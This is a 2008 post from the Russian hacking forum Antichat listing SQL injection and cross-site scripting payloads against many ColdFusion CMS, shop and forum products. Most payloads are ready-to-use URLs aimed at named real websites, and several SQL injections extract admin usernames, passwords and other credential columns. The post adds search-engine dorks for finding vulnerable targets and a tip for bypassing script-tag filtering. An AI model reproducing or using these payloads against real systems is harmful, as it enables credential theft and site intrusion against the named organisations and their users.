ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #5  
Старый 27.05.2008, 16:28
Аватар для Ded MustD!e
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

CartWeaver (Details.cfm ProdID) Remote SQL Injection Vulnerability

admin_username:
Цитата:
http://www.site.com/Details.cfm?ProdID=1%20and%201=convert(int,(select %20top%201%20admin_username%20from%20tbl_adminuser s))
admin_password:
Цитата:
http://www.site.com/Details.cfm?ProdID=1%20and%201=convert(int,(select %20top%201%20char(97)%2badmin_password%20from%20tb l_adminusers))
admin:
Цитата:
http://www.site.com/[script path]/cw2/admin/
dork:
allinurl: Details.cfm?ProdID=
allinurl: Results.cfm?category=

QuickEStore <= 8.2 (insertorder.cfm) Remote SQL Injection Vulnerability

admin password:
Цитата:
http://www.site.com/insertorder.cfm?CFID=123&CFTOKEN=1 union select 1,2,3,password,5,6,7,8,9,10,11,12 from params"having 1=1
link admin:
Цитата:
http://www.site.com/admin/
XSS в Savvy Content Manager

Уязвимость существует из-за недостаточной обработки входных данных в параметре "searchterms" в сценариях searchresults.cfm, search_results.cfm и search_results/index.cfm.

Example:
Цитата:
http://www.ulsf.org/cgi-bin/searchresults.cfm?search=Search&searchterm="><scri pt>alert('Antichat')</script>
XSS в Tradingeye Shop

Уязвимость существует из-за недостаточной обработки входных данных в параметре "image" в сценарии details.cfm.

Example:
Цитата:
http://www.azumahallpro.com/site/details.cfm?image="><script>alert('Antichat')</script>
XSS в iPostMX 2005

Уязвимость существует из-за недостаточной обработки входных данных в параметре "RETURNURL" в сценариях userlogin.cfm и account.cfm.

Example:
Цитата:
http://www.scenta.co.uk/home/userlogin.cfm?returnUrl="><script>alert('Antichat' )</script>
XSS в Goss iCM

Уязвимость существует из-за недостаточной обработки входных данных в параметре "keyword" в сценарии index.cfm.

Example:
Цитата:
http://www.simtropolis.com/stex/index.cfm?Keyword="><script>alert('Antichat')</script>
SQL-Inj в 1WebCalendar

Уязвимость существует из-за недостаточной обработки входных данных в параметре "EventID" в сценарии "viewEvent.cfm", в параметре "NewsID" в сценарии "news/newsView.cfm" и параметре "ThisDate" в сценарии "mainCal.cfm".

Example:
Цитата:
http://events.lapl.org/viewEvent.cfm?eventID=-1+union+select+1,2,3,4,5,6,unhex(hex(concat_ws(0x3 a,lapl_email,lapl_email_password,network_loginID,n etwork_password,win_loginID,win_password,LoginID,M ainPassword))),8,9,10,11,12,131,4,15,16,17,18,9,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7+from+user_access+limit+0,1/*
XSS в CommonSpot

Уязвимость существует из-за недостаточной обработки входных данных в параметре "bNewWindow" в сценарии "loader.cfm".

Example:
Цитата:
http://author.heritage.org/About/Departments/loader.cfm?url=/commonspot/security/login.cfm&bNewWindow="><script>alert('Antichat')</script>
XSS в e-publish

Уязвимость существует из-за недостаточной обработки входных данных в параметрах "obcatid" и "comid" в сценарии "show.cfm".

Example:
Цитата:
http://www.paratiritisnews.gr/show_archive.cfm?id=200&obcatid=4"><IMG SRC="javascript:alert('Antichat');">
Примечание: не раз уже сталкивался с тем, что когда мы подставляем <script>alert()</script>, то в сорсе открывающий тег заменяется на <InvalidTag>. Обходится очень просто, пример выше.

XSS в Honeycomb Archive

Межсайтовый скриптинг возможен из-за недостаточной обработки входных данных в параметре "keyword" в сценарии "search.cfm".

Example:
Цитата:
http://www.scu.edu/siteindex/search.cfm?keyword="><IMG SRC="javascript:alert('Antichat');">
XSS в Hot Banana Web Content Management Suite

Уязвимость существует из-за недостаточной обработки входных данных в параметре "keywords" сценария "index.cfm".

Example:
Цитата:
http://www.robertmorris.edu/search/index.cfm?keywords="><IMG SRC="javascript:alert('Antichat');">
XSS в CF_Nuke

Межсайтовый скриптинг возможен из-за недостаточной обработки входных данных в параметрах "cat", "topic" и "newsid".

Example:
Цитата:
http://www.nora.org/index.cfm?sector=news&page=read&newsid="><IMG SRC="javascript:alert('Antichat');">
SQL-Inj в Magic Forum Personal

Уязвимость существует при обработке входных данных в параметрах "ForumID", "Thread" и "ThreadID" в сценарии "view_forum.cfm".

Example:
Цитата:
http://www.fecca.org.au/forum/view_forum.cfm?ForumID=1+or+1=(SELECT+TOP+1+cast(L ogin+as+nvarchar)%2Bchar(58)%2Bcast(Password+as+nv archar)+from+ForumUsers)--
XSS в Simple Message Board

Уязвимость существует из-за недостаточной обработки входных данных в сценариях 'forum.cfm', 'user.cfm', thread.cfm' и 'search.cfm'.

Example:
Цитата:
http://www.hungrymonster.com/messageboard/thread.cfm?TID="><IMG SRC="javascript:alert('Antichat');">
XSS в Quick Cart

Уязвимость существует из-за некорректной обработки входных данных в параметре 'search' сценария 'search.cfm'.

Example:
Цитата:
http://www.guardianhomeexchange.com/ihea/search.cfm?search="><IMG SRC="javascript:alert('Antichat');">
XSS в FuseTalk

Уязвимость существует из-за некорректной обработки входных данных в параметре 'ProfileID' модуля 'tombstone.cfm'.

Example:
Цитата:
http://www.wilmott.com/tombstone.cfm?ProfileID="><IMG SRC="javascript:alert('Antichat');">

Последний раз редактировалось Ded MustD!e; 27.05.2008 в 22:13..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Форумы 48 28.12.2009 20:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ